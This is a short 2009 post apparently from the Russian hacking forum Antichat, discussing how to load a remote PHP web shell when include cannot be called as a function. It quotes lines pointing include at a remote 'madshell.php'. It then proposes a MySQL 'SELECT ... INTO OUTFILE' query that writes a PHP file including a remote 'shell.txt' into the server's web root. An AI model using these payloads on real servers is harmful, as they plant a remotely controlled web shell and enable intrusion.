02.02.2009, 12:19
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Сообщение от Dr.Frank
$a=include
$b='http://oneline.ucoz.ru/madshell.php'
Это не функция, а языковая конструкция
PHP код:
$a = array('include', 'require', 'eval');
var_dump(array_map('function_exists', $a));
ps: вопрос весьма интересный, перерываю php.net 
UPD:
первая идея. Ограничения: должен быть установлен коннект к базе и у пользователя бд должны быть File priv
Функция - mysql_query, параметр
select '<?php include "http://site.ru/shell.txt"; ?>' into outfile '/путь_до_корня_сервера/shell.php'
Последний раз редактировалось oRb; 02.02.2009 в 12:34..
|
|
|